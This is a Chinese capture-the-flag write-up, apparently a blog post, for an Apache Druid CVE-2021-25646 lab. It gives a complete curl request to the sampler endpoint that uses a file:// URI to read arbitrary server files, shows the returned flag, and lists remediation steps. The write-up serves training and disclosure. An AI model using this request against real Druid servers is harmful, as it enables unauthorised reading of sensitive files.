玄机靶场—Apache-druid(CVE-2021-25646) WP

YaBingSec2026-04-27 9:23

Apache-druid(CVE-2021-25646) 通关笔记

题目信息

  • 平台:玄机靶场
  • 题目 ID:197
  • 难度:简单
  • 积分:300 分
  • 类型:渗透
  • 漏洞编号:CVE-2021-25646

漏洞背景

Apache Druid 0.20.0 及以前版本中,/druid/indexer/v1/sampler 接口的 ioConfig.inputSource 支持多种数据源类型,包括 http 类型。该类型允许从指定 URI 拉取数据,而未对 file:// 协议进行限制,导致攻击者可以通过 file:///path/to/file 读取服务器本地任意文件。

虽然题目描述的是 JavaScript RCE(通过 javascript 类型的 filter/aggregator 执行任意 JS 代码),但本靶场环境中 JavaScript 功能被配置禁用(druid.javascript.enabled 未设置为 true),因此改用 http inputSource + file:// 协议实现任意文件读取。

靶机信息

  • IP:52.83.246.206
  • 端口:8888(Druid Router/Web Console)
  • 版本:Apache Druid 0.20.0

利用过程

步骤 1:确认服务版本

bash 复制代码 
curl -s "http://52.83.246.206:8888/status"

响应确认版本为 0.20.0,属于漏洞版本范围。

步骤 2:尝试 JavaScript RCE(失败)

通过 /druid/indexer/v1/sampler 发送包含 javascript 类型 filter 的 payload,服务器返回:

复制代码 
HTTP ERROR 500 java.lang.IllegalStateException: JavaScript is disabled

说明 druid.javascript.enabled 未启用,JavaScript 执行路径不可用。

步骤 3:改用 file:// 协议读取文件

利用 http 类型 inputSource 支持 file:// 协议的特性,直接读取 /flag.txt

bash 复制代码 
curl -s -X POST "http://52.83.246.206:8888/druid/indexer/v1/sampler" \
  -H "Content-Type: application/json" \
  -d '{
    "type": "index",
    "spec": {
      "type": "index",
      "ioConfig": {
        "type": "index",
        "inputSource": {
          "type": "http",
          "uris": ["file:///flag.txt"]
        },
        "inputFormat": {"type": "regex", "pattern": "(.*)", "columns": ["line"]}
      },
      "dataSchema": {
        "dataSource": "test",
        "timestampSpec": {"missingValue": "2021-01-01T00:00:00.000Z"},
        "dimensionsSpec": {"dimensions": ["line"]},
        "metricsSpec": [],
        "granularitySpec": {"type": "uniform", "segmentGranularity": "DAY", "queryGranularity": "NONE", "rollup": false}
      }
    },
    "samplerConfig": {"numRows": 10, "timeoutMs": 10000}
  }'

步骤 4:获取 FLAG

响应内容:

json 复制代码 
{"numRowsRead":1,"numRowsIndexed":1,"data":[{"input":{"line":"flag{b9b9dfac-6140-4de8-bf3d-4789ee0800cc}"},"parsed":{"__time":1609459200000,"line":"flag{b9b9dfac-6140-4de8-bf3d-4789ee0800cc}"}}]}

FLAGflag{b9b9dfac-6140-4de8-bf3d-4789ee0800cc}

Flag 汇总

步骤 内容 Flag
步骤1 读取 /flag.txt flag{b9b9dfac-6140-4de8-bf3d-4789ee0800cc}

修复建议

  1. 升级 Apache Druid 至 0.21.0 或更高版本。
  2. 若无法升级,在 common.runtime.properties 中确保 druid.javascript.enabled=false(默认值)。
  3. http 类型 inputSource 的 URI 进行白名单校验,禁止 file://jar:// 等本地协议。
  4. 部署网络访问控制,限制 Druid 管理端口(8888/8081/8090)的外部访问。
相关推荐
数智工坊2 分钟前
周志华《Machine Learning》学习笔记--第十一章--特征学习与稀疏学习
笔记·学习·机器学习
摇滚侠4 分钟前
git ignore 忽略 .idea 目录 全新项目(尚未提交过 .idea).idea 已经被 Git 跟踪(已提交过)
java·git·intellij-idea
linge_sun4 分钟前
SpringAI SQL 智能助手实战:用自然语言查询数据库
java·人工智能·ai编程
熟悉的新风景4 分钟前
maven常用依赖
java·maven
light blue bird5 分钟前
3C 数码电子BOM 协同工作台组件
java·开发语言·jvm·windows·.net·桌面端
喵叔哟6 分钟前
第2周学习笔记
笔记·python·学习·langchain
落羽的落羽6 分钟前
【项目】JsonRpc框架——功能测试、项目总结
linux·服务器·开发语言·c++·qt·算法·机器学习
ZC跨境爬虫10 分钟前
跟着 MDN 学JavaScript day_6:JavaScript 中的基础数学——数字与运算符
开发语言·前端·javascript·学习·ecmascript
我是一颗柠檬13 分钟前
【Redis】Redis分布式锁Day13(2026年)
java·redis·分布式·缓存
数智工坊1 小时前
周志华《Machine Learning》学习笔记--第十二章--计算学习理论
笔记·学习·机器学习
热门推荐
01GitHub 镜像站点022026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf03Codex 下载安装指南:Windows 和 macOS 官方版下载04【AI】2026 年具身智能模型和世界模型总结05Codex 桌面端更新后 Chrome 插件和 Computer Use 不可用,怎么排查和修复06【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法07CC-Switch 下载、安装与使用配置指南【2026.5.29】08CC-Switch & Claude 基于 Linux 服务器安装使用指南09Codex 接入 DeepSeek API 完整配置文档10裂开!ChatGPT 居然开始要手机号验证,附详细解决方法